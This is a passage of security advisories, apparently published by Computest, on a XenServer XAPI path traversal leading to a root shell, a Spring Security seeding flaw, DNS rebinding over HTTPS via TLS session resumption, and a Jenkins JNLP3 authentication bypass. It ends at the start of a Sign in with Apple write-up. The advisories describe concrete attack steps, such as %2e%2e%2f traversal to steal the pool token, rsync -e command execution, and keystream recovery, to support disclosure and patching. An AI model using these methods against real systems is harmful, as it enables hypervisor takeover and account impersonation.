Technical support for XenServer is available from Citrix.

Source

About XAPI:

The Xen Project Management API (XAPI) is:

  • A Xen Project Toolstack that exposes the XAPI interface. When we refer to XAPI as a toolstack, we typically include all dependencies and components that are needed for XAPI to operate (e.g. xenopsd).
  • An interface for remotely configuring and controlling virtualised guests running on a Xen-enabled host. XAPI is the core component of XenServer and XCP.

Source

While XAPI is maintained by the Xen project, it is not a required component of all Xen-based systems. It is required in XenServer.

Technical Background

Virtual machines have become the platform of choice for nearly all new IT infrastructure because of the massive benefits in manageability and resource optimization. However, a virtual machine can only be as secure as the platform it runs on.

For this reason compromising a hypervisor is always a high priority target, both during penetration tests and for real attackers.

The XAPI toolstack provides an API interface that is used both for communication between nodes in the same pool and for managing the pool, for example using a desktop application such as XenCenter. It is also the backend used by command line tools such as ‘xe’ and can be used by management platforms such as OpenStack, CloudStack, and Xen Orchestra.

Availability of the XAPI port, and vulnerability to DNS rebinding

While Citrix recommends keeping management traffic separate from storage traffic and VM traffic, in practice the system is often not configured this way. By default, the XAPI service appears to listen on any IP assigned to the hypervisor (actually the Dom0, to be precise). If no external interface is selected as a management interface, the XAPI service may still be accessible through one or more host internal management networks which can be made available to VMs.

The XAPI service is available both over unencrypted HTTP on port 80 and over HTTPS on port 443 (with a self-signed certificate by default).

The service does not check the HTTP Host header specified in requests, which makes the service vulnerable to DNS rebinding attacks. Using a DNS rebinding attack a remote attacker can reach a XAPI service on the internal network by convincing a user on the internal network to visit a malicious website, without needing to exploit any vulnerability in the web browser or client OS.

Either way, because of the importance of a hypervisor it still needs to be able to defend against attackers who have already gained access to internal networks.

Authentication and request handling in XAPI

In assessing the XAPI we started by identifying the parts of the code where authentication checks are performed. All code is available on GitHub.

The first thing to note is that API endpoints are registered using add_handler in the file /ocaml/xapi/xapi_http.ml.

let add_handler (name, handler) =

let action =
  try List.assoc name Datamodel.http_actions
  with Not_found ->
    (* This should only affect developers: *)
    error "HTTP handler %s not registered in ocaml/idl/datamodel.ml" name;
    failwith (Printf.sprintf "Unregistered HTTP handler: %s" name) in
let check_rbac = Rbac.is_rbac_enabled_for_http_action name in

let h = match handler with
  | Http_svr.BufIO callback ->
    Http_svr.BufIO (fun req ic context ->
        (try
           if check_rbac
           then (* rbac checks *)
             (try
                assert_credentials_ok name req ~fn:(fun () -> callback req ic context) (Buf_io.fd_of ic)
              with e ->
                debug "Leaving RBAC-handler in xapi_http after: %s" (ExnHelper.string_of_exn e);
                raise e
             )
           else (* no rbac checks *)
             callback req ic context

So in short: if Rbac.is_rbac_enabled_for_http_action returns true, authentication is not needed. Otherwise assert_credentials is called, which will throw an exception if the request is not authorized.

Looking into is_rbac_enabled_for_http_action a bit more, the following endpoints are exempted from authentication:

(* these public http actions will NOT be checked by RBAC *)
(* they are meant to be used in exceptional cases where RBAC is already *)
(* checked inside them, such as in the XMLRPC (API) calls *)
let public_http_actions_with_no_rbac_check =
  [
    "post_root"; (* XMLRPC (API) calls -> checks RBAC internally *)
    "post_cli";  (* CLI commands -> calls XMLRPC *)
    "post_json"; (* JSON -> calls XMLRPC *)
    "get_root";  (* Make sure that downloads, personal web pages etc do not go through RBAC asking for a password or session_id *)
    (* also, without this line, quicktest_http.ml fails on non_resource_cmd and bad_resource_cmd with a 401 instead of 404 *)
    "get_blob"; (* Public blobs don't need authentication *)
    "post_root_options"; (* Preflight-requests are not RBAC checked *)
    "post_json_options";
    "post_jsonrpc";
    "post_jsonrpc_options";
    "get_pool_update_download";
]

Authentication is performed in the function assert_credentials_ok, in the file /ocaml/xapi/xapi_http.ml. Some things to note about this function:

  • Besides username and password or an existing session_id, access can be granted by passing the pool_token parameter. This is a static token shared by all nodes in the pool, and is stored at /etc/xensource/ptoken. This token grants full administrative privileges.

  • Adminstrative access is granted for connections over a local UNIX socket.

This means that any vulnerability that can perform an arbitrary file read or access an internal socket will enable full administrative access.

Finding the primary vulnerability

Since there are not too many endpoints that bypass authentication, it makes sense to quickly skim over each one to see if there is anything interesting.

The mapping from HTTP verb (GET, POST, …) and URL to action name is located in the files under /ocaml/idl/datamodel*.m, and the mapping from action name to handler function happens in various calls to the add_handler function we already saw. We use this to find that, for example, the action get_pool_update_download is associated with a GET request to the /update/ URL, and is dispatched to the pool_update_download_handler function:

let pool_update_download_handler (req: Request.t) s _ =
  debug "pool_update.pool_update_download_handler URL %s" req.Request.uri;
  (* remove any dodgy use of "." or ".." NB we don't prevent the use of symlinks *)
  let filepath = String.sub_to_end req.Request.uri (String.length Constants.get_pool_update_download_uri)
                 |> Filename.concat Xapi_globs.host_update_dir
                 |> Stdext.Unixext.resolve_dot_and_dotdot 
                 |> Uri.pct_decode  in
  debug "pool_update.pool_update_download_handler %s" filepath;

  if not(String.startswith Xapi_globs.host_update_dir filepath) || not (Sys.file_exists filepath) then begin
    debug "Rejecting request for file: %s (outside of or not existed in directory %s)" filepath Xapi_globs.host_update_dir;
    Http_svr.response_forbidden ~req s
  end else begin
    Http_svr.response_file s filepath;
    req.Request.close <- true
end

This immediately looks extremely suspicious, in particular these two lines:

|> Stdext.Unixext.resolve_dot_and_dotdot
|> Uri.pct_decode  in

Here, the code is first resolving any ../ sequences, and after that it will perform decoding of urlencoding sequences such as %25. (In OCaml, the |> operator behaves somewhat like the | (pipe) operator in unix shell scripts.)

This means that if the decoding produces new ../ sequences, they will not be resolved and the naive check below it to verify that the produced path is under the update root directory is no longer sufficient.

In short, this leads to a classic path traversal vulnerability where %2e%2e%2f sequences can be used to escape the parent directory and read arbitrary files, including the file containing the pool token.

As described earlier, possession of the pool token enables full administrative access to the hypervisor.

Some notes about a potential alternative to the DNS rebinding attack

One other thing to note is that the response does not set a HTTP Content-Type header, which might make it possible for attackers to exploit a XAPI service on an internal network from the internet if they can trick someone on the internal network into visiting a malicious site (a scenario similar to the previously described DNS rebinding attack).

In this attack the malicious site would first perform a request that contains HTML and JavaScript in the URL, causing these to be written to a log file. In a second request, that logfile would then be loaded as a HTML page. The JavaScript on that page would then be able to read and exfiltrate the pool token and/or perform further requests using the pool token, something JavaScript on a random website on the internet would not normally be able to do because of the single origin policy enforced by web browsers.

This attack is overall much less practical than the DNS rebinding attack, and we have not investigated it further. The only advantage this attack has is that it could still work even if the XAPI was only available over HTTPS (DNS rebinding is in general not possible over HTTPS because the hostname will be validated by the TLS connection setup even if the HTTP server itself does not).

Obtaining a root shell on Dom0

While the pool token is sufficient to perform most actions on the hypervisor, an attacker is still restricted by the operations that the XAPI supports.

To determine the full impact we investigated whether it was possible to obtain full remote shell access as the operating system “root” user with this pool token. If so, it makes the impact story a good deal simpler: remote shell access as root means complete control, period.

As it turns out, it is possible to abuse the /remotecmd endpoint for this. The code for this endpoint is located in /ocaml/xapi/xapi_remotecmd.ml:

let allowed_cmds = ["rsync","/usr/bin/rsync"]

(* Handle URIs of the form: vmuuid:port *)
let handler (req: Http.Request.t) s _ =
  let q = req.Http.Request.query in
  debug "remotecmd handler running";
  Xapi_http.with_context "Remote command" req s
    (fun __context ->
       let session_id = Context.get_session_id __context in
       if not (Db.Session.get_pool ~__context ~self:session_id) then
         begin
           failwith "Not a pool session"
         end;
       let cmd=List.assoc "cmd" q in
       let cmd=List.assoc cmd allowed_cmds in
       let args = List.map snd (List.filter (fun (x,y) -> x="arg") q) in
       do_cmd s cmd args
    )

This appears to restrict the command to be executed to only rsync, but since rsync supports the -e option that lets you execute arbitrary shell commands anyway this restriction is not actually effective. Its unclear whether this constitutes a separate vulnerability, since there are plenty of other ways to abuse rsync to gain remote shell access (overwriting various config files or shellscripts, for example.)

This endpoint and the associated ability to execute shell commands is only available to ‘pool sessions’ (i.e. administrative sessions started by other nodes in the same pool), but because we have stolen the pool token we can produce such a session just by passing the stolen token in the right parameter.

Even though a complete exploit is deliberately not provided here, the core vulnerability is simple enough that an attacker will be able to exploit it with a minimum of effort.

Mitigating factors

Computest recommends verifying that none of the IPs assigned to the Dom0 are reachable from less-trusted networks (including the virtual networks assigned to the hosted virtual machines). While this is a best practice, it should not be considered a complete fix for this issue (especially considering the DNS rebinding concerns, which might provide an alternative route of attack).

Xen has noted that some versions of XenServer do not immediately create the /var/update directory on installation. Since the vulnerability can only be exploited when this directory exists, those versions will not be vulnerable directly after installation but will become vulnerable when installing their first update.

It is possible to prevent exploitation of this issue by moving the /var/update directory elsewhere and creating a file named /var/update to prevent the automatic creation of this directory. This will prevent the update functionality from working and may have further negative impact. It is not recommended by us, by Citrix, or by the Xen project, and we take no responsibility for problems caused by doing this.

Resolution

Xen has released a patch for the primary XAPI vulnerability under XSA-271 and has incorporated the fix in future XAPI versions.

Citrix will shortly publish or has published updates for supported XenServer releases 7.1 LTSR, 7.4 CR and 7.5 CR. Notably, no update will be published for version 7.3, which is out of support since June.

If you use either of these products you are advised to upgrade immediately.

Various cloud providers and other members of the Xen security pre-release list have received information about this vulnerability before the public release according to Xen’s usual policy (see also the timeline at the bottom of this document). If they were using XAPI they were able to apply the fix early.

If there is a risk that credentials stored on the dom0 or any of the VMs hosted by the hypervisor may have been compromised they should be changed.

There was previously no documented way of rotating the pool token, so Xen has provided the following steps to change it if deemed necessary.

  1. On all pool members, stop Xapi:

    service xapi stop
    
  2. On the pool master:

    rm /etc/xensource/ptoken
    /opt/xensource/libexec/genptoken -f -o /etc/xensource/ptoken
    
  3. Copy /etc/xensource/ptoken to all pool slaves

  4. On the pool master, restart the toolstack:

    xe-toolstack-restart
    
  5. On all pool slaves, restart the toolstack:

    xe-toolstack-restart
    

Note that rotating credentials (including the pool token) is not sufficient to lock out an attacker who has already established an alternative means of control. The above steps are only intended as a possible extra layer of assurance when there is already reasonable confidence that no attack happened, or possibly as part of making a “known good” backup from before an attack safe for use.

Conclusion

Xen and Citrix have responded quickly to patch the issue. However, older versions of XenServer remain without a patch, and upgrading XenServer may not be easy for some users because some features are no longer supported in the free version distributed by Citrix.

In response to the miscellaneous concerns raised in this document Xen has documented a new procedure to change the pool token if desired, but we have had no clear indication of whether other things such as the DNS rebinding aspect will be addressed in the future.

The unexpected discovery of this vulnerability during a basic software quality review shows once again that it’s more than worth it to spend some extra time during network design to lock down and segregate management services. Especially since the consequences of bugs in such basic infrastructure can be disastrous and patching is often complicated.

In our opinion the XAPI service does not take a very principled approach in its HTTP and authentication layers, which provided room for this bug and some of the other things we mentioned when investigating the impact of this vulnerability.

Timeline

2018-07-04 Disclosure of our draft to Xen and Citrix security teams
2018-07-05 First response from the Xen security team, XSA-271 assigned
2018-07-05 First response from the Citrix security team
2018-07-17 Xen proposes embargo date of 2017-08-14
2018-07-20 Agreed to set embargo date at 2018-08-14
2018-07-30 Received draft of Xen’s advisory
2018-07-31 Xen sends its advisory to its pre-release partners
2018-08-14 Public release of advisories

Spring Security - insufficient cryptographic randomness

4 July 2019 at 00:00

The SecureRandomFactoryBean class in Spring Security by Pivotal has a vulnerability in certain versions that could lead to the generation of predictable random values when a custom seed is supplied. This contradicted the documentation that states that adding a custom seed does not decrease the entropy. The cause of this bug is the use of the Java SecureRandom API in an incorrect way. This vulnerability could lead to predictable keys or tokens in applications that depend on cryptographically-secure randomness. This vulnerability was fixed by Pivotal by ensuring that the proper seeding always takes place.

Applications that use this class may need to evaluate if any predictable tokens were generated that should be revoked.

Technical Background

The SecureRandom class in Java offers a cryptographically secure pseudo-random number generator. It is often the best method in Java for generating keys, tokens or nonces for which unpredictability is critical. When using this class multiple algorithms may be available. An explicit algorithm can be selected by calling (for example) SecureRandom.getInstance("SHA1PRNG"). The seeding of an instance generated this way happens as soon as the first bytes are requested, not during creation.

Normally, when calling setSeed() on a SecureRandom instance the seed is incorporated into the state, to supplement its randomness. However, when calling setSeed() on a instance newly created with an explicit algorithm there is no state yet, therefore the seed will set the entire state and no other entropy is used.

This is mentioned in the documentation for SecureRandom.getInstance():

https://docs.oracle.com/javase/7/docs/api/java/security/SecureRandom.html

The returned SecureRandom object has not been seeded. To seed the returned
object, call the setSeed method. If setSeed is not called, the first call to
nextBytes will force the SecureRandom object to seed itself. This self-
seeding will not occur if setSeed was previously called.

This text is misleading, as the first two sentences may give the impression that the instance could be unsafe to use without seeding, while the self-seeding will in fact be much safer than supplying the seed for almost all applications.

This is a well known flaw in the design that can lead to incorrect use that has been discussed before:

https://stackoverflow.com/a/27301156

You should never call setSeed before retrieving data from the "SHA1PRNG" in
the SUN provider as that will make your RNG (Random Number Generator) into a
Deterministic RNG - it will only use the given seed instead of adding the
seed to the state. In other words, it will always generate the same stream
of pseudo random bits or values.

Google noticed that on Android some apps depend on this unexpected usage, which made it difficult to change the behaviour.

https://android-developers.googleblog.com/2016/06/security-crypto-provider-deprecated-in.html

A common but incorrect usage of this provider was to derive keys for
encryption by using a password as a seed. The implementation of SHA1PRNG had
a bug that made it deterministic if setSeed() was called before obtaining
output.

Vulnerability

The SecureRandomFactoryBean class in spring-security returns a SecureRandom object with SHA1PRNG as explicit provider. It is optionally possible to set a Resource as a seed:

security/core/token/SecureRandomFactoryBean.java#L37-L52

public SecureRandom getObject() throws Exception {
    SecureRandom rnd = SecureRandom.getInstance(algorithm);

    if (seed != null) {
        // Seed specified, so use it
        byte[] seedBytes = FileCopyUtils.copyToByteArray(seed.getInputStream());
        rnd.setSeed(seedBytes);
    }
    else {
        // Request the next bytes, thus eagerly incurring the expense of default
        // seeding
        rnd.nextBytes(new byte[1]);
    }

    return rnd;
}

The documentation of SecureRandomFactoryBean.setSeed() states (contradictory to the documentation of SecureRandom itself):

Allows the user to specify a resource which will act as a seed for the
SecureRandom instance. Specifically, the resource will be read into an
InputStream and those bytes presented to the SecureRandom.setSeed(byte[])
method. Note that this will simply supplement, rather than replace, the
existing seed. As such, it is always safe to set a seed using this method
(it never reduces randomness).

When used with a seed this means that a SecureRandom instance is generated in the vulnerable way as described above. In other words, the Resource entirely determines all output of this PRNG. If two different objects are created with the same seed then they will return identical output. The note in the documentation stating that it supplements the seed and can not reduce randomness was therefore false.

Recommendation

The easiest way to prevent this vulnerability would be to request the first byte even if a seed is set, before calling setSeed():

SecureRandom rnd = SecureRandom.getInstance(algorithm);

// Request the first byte, thus eagerly incurring the expense of default
// seeding and to prevent the seed from replacing the entire state.
rnd.nextBytes(new byte[1]);

if (seed != null) {
    // Seed specified, so use it
    byte[] seedBytes = FileCopyUtils.copyToByteArray(seed.getInputStream());
    rnd.setSeed(seedBytes);
}

This, however, requires that no application depends on the current possibility of using SecureRandom fully deterministically.

Mitigation

Applications that use SecureRandomFactoryBean with a vulnerable version of Spring Security can mitigate this issue by not providing a seed with setSeed() or ensuring that the seed itself has sufficient entropy.

Conclusion

Pivotal responded quickly and fixed the issue in the recommended way in Spring Security. However, depending on the applications that use this library, keys or tokens which were generated using insufficient randomness may still exist and be in use. Applications that use SecureRandomFactoryBean should investigate if this may be the case and if any keys or tokens need to be revoked.

Applications that rely on using SecureRandomFactoryBean to generate deterministic sequences will no longer work and should switch to a proper key-derivation function.

Timeline

2019-03-08 Report sent to [email protected].
2019-03-09 Reply from Pivotal that they confirmed the issue and are working on a fix.
2019-03-18 Fixed by Pivotal in revision 9c1eac79e2abb50f7b01e77c2418566f2a30532f.
2019-04-02 Vulnerability report published by Pivotal.
2019-04-03 Spring Security 5.1.5, 5.0.12, 4.2.12 released with the fix.
2019-07-04 Advisory published by Computest.

DNS rebinding for HTTPS

25 November 2019 at 00:00

A DNS rebinding attack is possible against a server that uses HTTPS by abusing TLS session resumption in a specific way.

In addition, the implementation of the Extended Master Secret extension in SChannel contained a vulnerability that made it ineffective.

Technical background

A DNS rebinding attack works as follows: an attacker A waits for a user C to visit the attacker’s website, say attacker.example. The DNS record for attacker.example initially points to an IP address of the attacker with a low TTL. Once the page is loaded, JavaScript repeatedly attempts to communicate back to attacker.example using the XMLHttpRequest API. As this is in the same origin, the attacker can influence almost everything about the request and can read almost every part of the response.

The attacker then updates this DNS record to point to a different server (not owned by A) instead. This means that the requests intended for attacker.example end up at a different server after the record expires, say, server.example owned by S. If this server does not check the HTTP Host header of the request, then it may accept and process it.

The proper way to prevent this attack is to ensure that web servers verify that the Host header on every request matches a host that is in use by that server. Another workaround that is commonly recommended is to use HTTPS, as the attack as described does not work with HTTPS: when the DNS record is updated and C connects to server.example, C will notice that the server does not present a valid certificate for attacker.example, therefore the connection will be aborted.

The most interesting scenarios for this attack involve attacking a device on the network (or even on the local machine) of C. This is due to a number of reasons, one of which is the problems with HTTPS.

Attack

It is possible to perform a DNS rebinding attack to a HTTPS server by abusing TLS session resumption in a specific way. Contrary to the “normal” DNS rebinding attack, A needs to be able to communicate with S to establish a session that C will later resume. This attack is similar to the Triple-Handshake Attack 3SHAKE, however, the measures that were taken by TLS implementations in response to that attack do not adequately defend against this attack.

Just like in the 3SHAKE attack, A can set up two connections C -> A and A -> S that have the same encryption keys and then pass the session ID or session ticket from S on to C. This is known as an “Unknown Key-Share Attack”. Contrary to the 3SHAKE attack, however, A can update the DNS record for attacker.example before the session is resumed. TLS resumption does not re-transmit the certificate of the server, both endpoints will assume that the certificate is still the same as for the previous connection. Therefore, when C resumes the connection at S, C assumes it has an encrypted connection authenticated by attacker.example, while S assumes it has sent the certificate for server.example on this connection.

To any web applications running on S, the connection will appear to be originating from C’s IP address. If the website on server.example has functionality that is IP restricted to only be available to C, then A will be able to interact with this functionality on behalf of C.

In more detail:

  1. C opens a connection to A, using client random r1 in the ClientHello message.

  2. A opens a connection to S, using the same client random r1. A advertises only the ciphers C included that use RSA key exchange and A does not advertise the “extended master secret” TLS extension.

  3. S replies to A with server random r2 and session ID s in the ServerHello message.

  4. A replies to C with server random r2 and session ID s and the same cipher suite as chosen for the other connection, but A’s own certificate. A makes sure that the extended master secret extension is not enabled here either.

  5. C sends an encrypted pre-master secret to A. A decrypts this value using the private RSA key corresponding to A’s certificate to obtain its value, p.

  6. A also sends p in a ClientKeyExchange to S, now encrypted with the public key of S.

  7. Both connections finish. The master secret for both is derived only from r1, r2 and p. Therefore, they are identical. A knows this master secret, so it can cleanly finish both handshakes and exchange data on both connections.

  8. A sends a page containing JavaScript to C.

  9. A updates the DNS record for attacker.example to point to S’s IP address instead.

  10. A closes the connections with C and S.

  11. Due to an XHR request from A’s JavaScript, C will reconnect. It receives the new DNS record, therefore it resumes the connection at S, which will work as it recognises the session ID and the keys match. As it is a resumption, the certificate message is skipped.

  12. JavaScript from A can now send HTTP requests to S within the origin of attacker.example.

Cipher selection

A can force the use of a specific cipher suite on the first two connections, assuming both C and S support it. It can indicate support for only the desired cipher suite(s) on the connection A -> S and then select the same cipher suite on the C -> A connection.

When a session is resumed, the same cipher suite is used as the original connection did. Because A removed certain cipher suites, the ClientHello that is used for resumption will most certainly indicate stronger ciphers than the cipher the original connection had. A server could detect this and then decide to perform a full handshake instead, because this way a stronger cipher suite would be used. It appears that few servers actually do this.

Extended master secret

In response to the 3SHAKE attack, the extended master secret (EMS) extension was added to TLS in RFC 7627. This extension appears to be implemented by most browsers, however, support on servers is still limited. This extension would make the Unknown Key-Share attack impossible, as the full contents of the initial handshake messages (including the certificates) are included in the master secret computation, not just the random values.

The attack is impossible if both client and server support EMS and enforce its usage. However, as server support is limited (browser) clients currently do not require it.

When the extension is not required but supported by both the client and the server, it could be used to detect the above attack and refuse resumption (making the attack impossible as well). If the server receives a ClientHello that indicates support for EMS and which attempts to resume a session that did not use EMS, it must refuse to resume it and perform a full handshake instead.

This is described in RFC 7627 as follows:

 o  If the original session did not use the "extended_master_secret"
    extension but the new ClientHello contains the extension, then the
    server MUST NOT perform the abbreviated handshake.  Instead, it
    SHOULD continue with a full handshake (as described in
    Section 5.2) to negotiate a new session.

This is, however, not universally followed by servers. Most notably, we found that IIS indicates support for EMS in the full-handshake ServerHello, but when a ClientHello is received that indicates support for EMS that requests to resume a session that did not use EMS, IIS allows it to be resumed. We also found that servers hosted by the Fastly CDN were vulnerable in the same way.

The attack also works when the server does not support EMS, but the client does. The Interoperability Considerations in §5.4 of RFC 7627 only say the following about that:

 If a client or server chooses to continue an abbreviated handshake to
 resume a session that does not use the extended master secret, then
 the current connection becomes vulnerable to a man-in-the-middle
 handshake log synchronisation attack as described in Section 1.
 Hence, the client or server MUST NOT use the current handshake's
 "verify_data" for application-level authentication.  In particular,
 the client MUST disable renegotiation and any use of the "tls-unique"
 channel binding [RFC5929] on the current connection.

This section only highlights risks for renegotiation and channel binding on this connection. The ability to perform a DNS rebinding attack does not seem to have been considered here. To address that risk, the only option is to not resume connections for which EMS was not used and for which the remote IP address has changed.

Other configurations

The sequence of handshake messages is different when session tickets are used instead of ID-based resumption, but the attack still works in pretty much the same way.

While the example above used the RSA key exchange, as noted by the 3SHAKE attack the DHE or ECDHE key exchanges are also affected if the client accepts arbitrary DHE groups or ECDHE curves and does not verify that these are secure. Support for DHE is removed in all common browsers (except Firefox) and arbitrary ECDHE curves appears to never have been supported in browsers. When using Curve25519, certain “non-contributory” points can be used to force a specific shared secret. The TLS implementations we looked at correctly reject those points.

TLS 1.3 is not affected, as in that version the EMS extension is incorporated into the design.

SNI also influences the process. On the initial connection, the attacker can pick the name that is indicated for SNI. While a large portion of webservers is configured to reject unknown Host headers, almost no HTTPS servers were found that reject the handshake when an unknown SNI name is received, servers most often reply with a certain “default” certificate. We found that some servers require the SNI name for a resumption to be equal to the SNI name for the original connection. If this is not the case then it may be possible to change the selected virtual host based on the SNI name of the first connection, though we did not find a server configured like this in practice.

It may also be possible for A to send a client certificate to S on the first connection, and then attribute the messages sent after the resumption to A’s identity. We did not find a concrete attack that would be possible using this, but for other protocols that rely on TLS it may be an issue.

The attack as described relies on A updating their DNS record. Even with a minimal TTL, this may require a long time for all caches to obtain the updated record. This is not required for the attack: A can include two IP addresses in the in the A/AAAA record, the first being A’s own address, the second the address of the victim. Once A has delivered the JavaScript and session ID/ticket, A can reject connections from the user (by sending a TCP RST response), which means the browser will fall back to the second IP address, therefore connecting to S instead.

Exploitation

We wrote a tool to accept TLS connections and perform the attack by establishing a connection to a remote server with the same master secret and forwarding the session ID. By subsequently refusing connections, it was possible to cause browsers to resume its session at the remote server instead.

We have performed this attack successfully against the following browsers:

  • Safari 12.1.1 on macOS 10.14.5.
  • Chrome 74.0.3729.169 on macOS 10.14.5.
  • Safari on iOS 12.3.
  • Microsoft Edge 44.17763.1.0 on Windows 10.
  • Chrome 74.0.3729.169 on Windows 10.
  • Internet Explorer 11 on Windows 7.
  • Chrome 74.0.3729.61 on Android 10.

As mentioned, we also found the following server vulnerable to allowing a resumption of a non-EMS connection using an EMS ClientHello:

  • IIS 10.0.17763.1 on Windows 10.

Firefox is (currently) not vulnerable, as its TLS session storage separates sessions by remote IP address and will not attempt to resume if the IP address has changed. (https://bugzilla.mozilla.org/show_bug.cgi?id=415196)

Impact

To summarise, this vulnerability can be used by an attacker to bypass IP restrictions on a web application, provided that the web server:

  • supports TLS session resumption;
  • does not support the EMS TLS extension (or does not enforce it, like IIS);
  • can be connected to by an attacker;
  • does not verify the Host header on requests or the targeted web application is the fallback virtual host;
  • has functionality that is restricted based on IP address.

As it cannot be determined automatically whether a website has functionality that is IP restricted, we could not determine the exact scale of vulnerable websites. Based on a scan of the top 1M most popular websites, we estimate that about 30% of webservers fulfil the first 2 requirements.

Resolution

Chrome 77 will not allow TLS sessions to be resumed if the RSA key exchange is used and the remote IP address has changed.

SChannel (IE/Edge) in update KB4520003 will not allow TLS sessions to be resumed if EMS was not used and the implementation of EMS on the server was fixed to not allow non-EMS sessions to be resumed using an EMS-handshake.

Safari in macOS Catalina (10.15) will not allow TLS sessions to be resumed if the remote IP address has changed.

Fastly has fixed their TLS implementation to also not allow non-EMS sessions to be resumed using an EMS-handshake.

Due to these changes, servers may notice a decrease in the percentage of sessions that are successfully resumed. In order to maximise the chance of successful resumption, servers should make sure that:

  • Cipher suites using RSA key exchange are only used if ECDHE is not supported by the client.
  • The Extended Master Secret extension is supported and enabled by the server.
  • Clients connect to the same server IP address as much as possible, for example by ensuring the TTL of DNS responses is high if multiple IP addresses are used.

When using TLS 1.3, the RSA key exchange is no longer allowed and Extended Master Secret has become part of the design instead of an extension. Therefore, the first two recommendations are no longer needed.

Timeline

2019-06-03 Report sent to Google, Apple, Microsoft.
2019-07-01 Fix committed for Chromium.
2019-07-15 EMS problem reported to Fastly.
2019-07-30 Fix by Fastly deployed and confirmed.
2019-09-11 Chrome 77 released with the fix.
2019-10-07 macOS Catalina released with the fix.
2019-10-08 Update KB4520003 released by Microsoft with the fix.

Jenkins - authentication bypass

30 January 2020 at 00:00

During a short review of the Jenkins source code, we found a vulnerability that can be used to bypass the mutual authentication when using the JNLP3 remoting protocol. In particular, this allows anyone to impersonate a client and thereby gain access to the information and functionality that should only be available to that client.

Technical Background

Jenkins supports 4 different versions of the remoting protocol. 1 and 2 are unencrypted, 3 uses a custom handshake protocol and 4 is secured using TLS. The vulnerability exists only in version 3.

1, 2 and 3 are deprecated and warnings are shown when they are enabled. However, these warnings and the documentation only mention stability impact, no security impact, such as a lack of authentication.

As described in the documentation in the code, the JNLP3 handshake works as follows:

src/main/java/org/jenkinsci/remoting/engine/JnlpProtocol3Handler.java#L80-L110

Client                                                                Master
          handshake ciphers = createFrom(agent name, agent secret)
 
  |                                                                     |
  |      initiate(agent name, encrypt(challenge), encrypt(cookie))      |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                       encrypt(hash(challenge))                      |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                          GREETING_SUCCESS                           |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                         encrypt(challenge)                          |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                       encrypt(hash(challenge))                      |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
  |                          GREETING_SUCCESS                           |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                          encrypt(cookie)                            |
  |  <<<--------------------------------------------------------------  |
  |                                                                     |
  |                  encrypt(AES key) + encrypt(IvSpec)                 |
  |  -------------------------------------------------------------->>>  |
  |                                                                     |
 
             channel ciphers = createFrom(AES key, IvSpec)
          channel = channelBuilder.createWith(channel ciphers)

The encrypt function in this diagram uses keys that are derived from the client name and client secret. The exact procedure createFrom is not important for this issue, just that the keys only depend on the client name and secret and are therefore constant for all connections between that client and the master:

src/main/java/org/jenkinsci/remoting/engine/HandshakeCiphers.java#L108-L123

The encryption algorithm used is AES/CTR/PKCS5Padding:

src/main/java/org/jenkinsci/remoting/engine/HandshakeCiphers.java#L135

Vulnerability

As is commonly known, CTR mode must never be reused with the same keys and counter (IV): the encrypted value is generated by bytewise XORing a keystream with the plaintext data. When two different messages are encrypted using the same key and counter, the XOR of the two ciphertexts gives the XOR of the plaintexts as the keystream is canceled out. If one plaintext is known, this makes it possible to determine the keystream and the data in the second plaintext.

Each call to encrypt in the diagram above restarts the cipher, therefore, even when performing the handshake just once the keystream is reused multiple times.

Knowing the first ~2080 bytes of the AES-CTR keystream is enough to impersonate a client: the client needs to be able decrypt the server’s challenge, which is around 2080 bytes. All other packets are smaller than that.

Exploitation

There are a number of ways to trick the server into encrypting a known plaintext, which allows an attacker to recover a part of the keystream, which can then be used to decrypt other packets. We describe a relatively efficient approach below, but many different (possibly more efficient) approaches are likely to exist.

The client can send an initiate packet with the challenge as an empty string. This means that the response from the server will always be the encryption of the SHA-256 hash of the empty string. This allows the attacker to decrypt the initial bytes of the keystream.

Then, the attacker can obtain the rest of the keystream byte by byte in the following way: The attacker encrypts a message that is exactly as long as the keystream the attacker currently knows and appends one extra byte. The server will respond with one of 256 possible hashes, depending on how the extra byte was decrypted by the server. The attacker can decrypt the hash (because a large enough prefix is already known from the previous step) and determine which byte the server had used, which can be XORed with the ciphertext byte to obtain the next keystream byte.

There is one complication to this approach: in many places in the handshake binary data is for some unknown reason interpreted as ISO-8859-1 and converted to UTF8 or vice versa. This means that when the decrypted challenge ends in a character that is a partial UTF-8 multibyte sequence, the character is ignored. In that case, it is not possible to determine which character the server had decrypted. By trying at most 3 different bytes, it is possible to find one that is valid.

We have developed a proof-of-concept of this attack. Using this, we were able to retrieve enough bytes of the keystream to pass authentication with about 3000 connections to Jenkins, which took around 5 minutes against a local server. As mentioned, it is likely that this can be reduced even further.

It is also possible to perform a similar attack to impersonate a master against a client if the connection can be intercepted and the client automatically reconnects. We did not spend time performing this.

Recommendation

It is not possible to prevent this attack in a way that is backwards compatible with existing JNLP3 clients and masters. Therefore, we recommend removing support for JNLP3 completely. Arguably, JNLP1 and JNLP2 protocols are safer to use as those can only be taken over if a connection is intercepted. A safer encrypted alternative already exists (JNLP4), so investing time in fixing this protocol would not be needed.

Resolution

We reported the issue to the Jenkins team, who coincidentally were already considering removing support for the version 1, 2 and 3 remoting protocols as they are deprecated and were known to have stability impact. These protocols have now been removed in Jenkins 2.219. In version 2.204.2 of the LTS releases of Jenkins, this protocol can still be enabled by setting a configuration flag, but this is strongly discouraged.

Users using an older version of Jenkins can mitigate this issue by not enabling version 3 of the remoting protocol.

Timeline

2019-12-06 Issue reported to Jenkins as SECURITY-1682.
2019-12-06 Issue acknowledged by the Jenkins team.
2020-01-16 Fix prepared.
2020-01-29 Advisory published by Jenkins
2020-01-30 This advisory published by Computest.

Sign in with Apple - authentication bypass

1 July 2020 at 00:00

A couple of weeks ago we found a vulnerability that could be used to gain unauthorized access to an iCloud account, by abusing a new feature allowing TouchID to log in to websites.

In iOS 13 and macOS 10.15, Apple added the possibility to sign in on Apple’s own sites using TouchID/FaceID in Safari on devices which include the required biometric hardware.

When you visit any page with a login form for an Apple-account, a prompt is shown to authenticate using TouchID instead. If you authenticate, you’re immediately logged in. This skips the 2-factor authentication step you would normally need to perform when logging in with your password. This makes sense because the process can be considered to already require two factors: your biometrics and the device. You can cancel the prompt to log in normally, for example if you want to use a different AppleID than the one signed in on the phone.

